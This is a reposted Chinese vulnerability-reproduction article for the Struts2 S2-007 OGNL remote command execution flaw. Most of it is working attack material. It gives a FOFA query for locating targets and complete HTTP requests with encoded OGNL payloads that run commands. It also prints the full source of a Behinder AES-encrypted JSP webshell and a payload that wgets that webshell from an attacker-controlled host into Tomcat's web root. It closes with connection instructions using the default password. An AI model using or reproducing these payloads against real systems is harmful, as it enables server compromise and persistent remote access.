本文转载于公众号:融云攻防实验室,原文地址:
漏洞复现-Struts2-007 远程命令执行漏洞
0x01 阅读须知
资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明
0x02 漏洞描述
Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用JavaServlet/JSP技术,实现了基于JavaEEWeb应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品。Struts2-007是因为发生转换错误时,将用户输入评估为OGNL表达式。这允许恶意用户执行任意代码。
0x03 漏洞复现
漏洞影响:Struts2 2.0.0 – 2.2.3
FOFA:Struts2
1.输入验证poc ‘+(#application)+’,回显了路径等一些内容,证明存在漏洞
2.构造poc查看文件ls(有webapps证明这里为tomcat,tomcat默认的主页路径为/usr/local/tomcat/webapps/ROOT/)
POST /user.action HTTP/1.1
Host: x.x.x.x:8080
Content-Length: 335
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://x.x.x.x:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=3A6C8BA16F922D277F7E81E3A467DB69
Connection: close
name=1&email=1&age=\'%20%2B%20(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec(\'ls\').getInputStream()))%20%2B%20\'
3.设置一个python3下载文件的网页,上存放冰蝎马,并构造wget下载远端冰蝎马命令
#python3下载如下:
python3 -m http.server 80
#冰蝎马如下:
<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
#下载代码如下:
wget http://x.x.x.x/shell.jsp -O /usr/local/tomcat/webapps/ROOT/shell.jsp
4.构造下载远端冰蝎马到tomcat根目录的payload
POST /user.action HTTP/1.1
Host: x.x.x.x:8080
Content-Length: 437
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://x.x.x.x:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=3A6C8BA16F922D277F7E81E3A467DB69
Connection: close
name=1&email=1&age=\'%20%2B%20(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec(\'wget%20http%3A%2F%2Fx.x.x.x%2Fshell.jsp%20-O%20%2Fusr%2Flocal%2Ftomcat%2Fwebapps%2FROOT%2Fshell.jsp\').getInputStream()))%20%2B%20\'
5.冰蝎连接,得到一个shell
http://x.x.x.x:8080/shell.jsp #路径,默认密码为rebeyond
THE END
暂无评论内容